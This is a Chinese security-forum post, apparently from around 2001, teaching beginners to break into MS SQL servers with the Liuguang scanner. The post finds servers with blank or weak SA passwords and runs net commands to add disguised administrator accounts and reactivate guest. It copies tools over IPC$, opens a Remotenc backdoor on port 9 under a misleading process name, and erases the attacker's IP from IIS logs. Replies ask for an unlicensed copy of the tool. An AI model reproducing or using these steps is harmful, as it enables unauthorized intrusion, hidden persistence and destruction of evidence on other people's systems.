|
 | 作者: coolcat [coolcat]
 论坛用户 |
登录 |
| 流光是个很不错的集扫描+入侵于一体的“超级工厂”。 他的SQL扫描功能很强。。。这里就浅谈一下SQL吧。 准备工具: 1. 扫描器:of course 流光IV(主角) 2. Remotenc (小容的后门工具) 3. cleaniislog (小容的打扫战场的工具) 准备好了,就开始把~ Start.... 打开流光, 探测---〉扫描POP3/FTP/NT/SQL---〉 (此步可用ctrl+R完成) 在弹出的对话框中输入 启始ip ,like : 211.1.1.1(例子,请不要照抄) 在中止ip那里会自动的添出: 211.1.1.255 然后“扫描主机类型”选:SQL. (p.s :把“将frontpage主机自动加入http列表的勾去掉,我们只找SQL漏洞阿。frontpage下次吧) 搞定后: 确定 running.... 怎么样,有没有找到SA 密码为空或一些弱密码的SQL主机? 没? 唉,你太样衰了,快去洗个脸,换个ip段在试试... 怎么样?找到了~~ ok, 在流光下面会出现找到的主机, 点鼠标左键----〉连接。 wait... 是不是在dos窗口里 出现了: Connect to 211.1.1.1 MSSQL server success. Type Command at Prompt. SQLCMD> 这里要用到一些net 命令拉~~ 不会,没关系,我也不会!!不过,只要会几个就好啦~ SQLCMD>net user (看看有什么用户) SQLCMD>net user SQLAdmin 111 /add (添加一个SQLAdmin 密码为111的用户 注意,要取个好名字,迷惑管理员) SQLCMD>net localgroup adminstrators SQLAdmin /add (把SQLAdmin加入到administrators 组里面,这样你就是Adminstrator啦~~ 呵呵。。爽) SQLCMD>net user (看看有没有SQLAdmin,有的话。。。成功啦~) 或SQLCMD>net user SQLAdmin (看看你添加的SQLAdmin 的信息,看看是不是Admin) SQLCMD>net user guest /active:yes (激活guest) SQLCMD>net user guest 111 (改掉他的密码) SQLCMD>net localgroup Administrators guest /add (把guest也加入administraotrs组) 这样的好处是:如果有一天管理员发现你的SQLAdmin账号并删掉后,你还可以通过guest这个帐号。。。呵呵,一般管理员不会去注意它的,因为它是装系统时的默认账号。 SQLCMD>exit (退出吧) 这样,你已经在肉鸡上建立了你的有adminstrator权限的账号,下一步就是入侵了。 先建立一个ipc$连接,copy 一些工具过去。在dos窗口 c:\>net use \\211.1.1.1\ipc$ "111" /user:"SQLAdmin" (密码,用户名要是肉鸡上的admin的) c:\>copy C:\hacker\cleaniislog\cleaniislog.exe \\211.1.1.1\Admin$\system32 (C:\hacker\cleaniislog 是我电脑cleaniislog的目录 .copy cleaniislog.exe到211.1.1.1的winnt\system32里,这样方便随时调用,还有,那里文件比较多,不易发掘!对了,cleaniislog最好改个名,像clean等,方便输入) 看到copy成功后,就要进入肉鸡拉。 用Remotenc开后门 C:\hacker\remotenc\remotenc 211.1.1.1(肉鸡ip) SQLAdmin(用户名) 111(密码) localsystem Server Server 9 aaa (打开端口9, 密码aaa 并让remotenc建立进程名字为Server 迷惑管理员。) C:\telnet 211.1.1.1(肉鸡ip) 9 (telnet上肉鸡) 输入aaa你的密码 Remotenc> (这样就进来了) 回用DOS吗? 呵呵,会用就行了~~ 不会? 那。。。我没办法啦! ok,入侵成功啦~~想干嘛干嘛把。 打扫脚印。 Remotenc>cleaniislog C:\winnt\system32\logfiles\w3svc1\ex011230.log 你自己的ip (指定清楚ex011229这个日志里你的ip. 肉鸡不同,文件位置可能不同。有可能w3svc2, w3svc3, 不要照抄!ex011230.log 是01年12月30日的(今天),你要找到你入侵那天的哦。 The End! By the way :我上次写的《关于SOCK5 QQ代理制做!》省略了入侵过程,现在正好补出。 p.s: 本人水平有限,望各位高手不要见笑! |
| 地主 发表时间: 12/31 1:39 |
 | 回复: auqdcpl [auqdcpl] 论坛用户 |
登录 |
|
那有流光没有时间限制的版本下呀 |
| B1层 发表时间: 02/24 17:11 |
 | 回复: alixlinn [alixlinn]  论坛用户 |
登录 |
|
没有,只有补丁。 |
| B2层 发表时间: 02/24 17:21 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 关于流光SQL入侵(only for跟我一样的菜鸟!)